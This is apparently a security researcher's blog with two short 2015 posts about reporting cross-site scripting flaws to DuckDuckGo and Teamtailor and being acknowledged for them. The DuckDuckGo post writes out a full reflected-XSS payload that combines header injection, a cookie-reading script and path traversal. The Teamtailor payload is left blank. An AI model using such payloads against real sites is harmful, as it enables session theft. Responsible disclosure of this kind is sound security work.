Sunday, 20 September 2015

Acknowledgement + SWAG by Duck Duck Go

Vulnerability: Reflected Cross Site Scripting XSS
Vuln function: Search box

Payload: ref:xxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/script%3e%2F..%2F..%2F..%2F../tr

Got Acknowledgement + SWAG by Duck Duck Go for reporting security vulnerability. :)

Monday, 14 September 2015

Listed Security Hall of Fame at Teamtailor.

1) Vulnerability Name:

XSS: Cross Site Scripting Vulnerabilities

2) Vulnerability Point:

Inset video tag at User Profile edit page. ( )

3) Payload:


Hall of fame: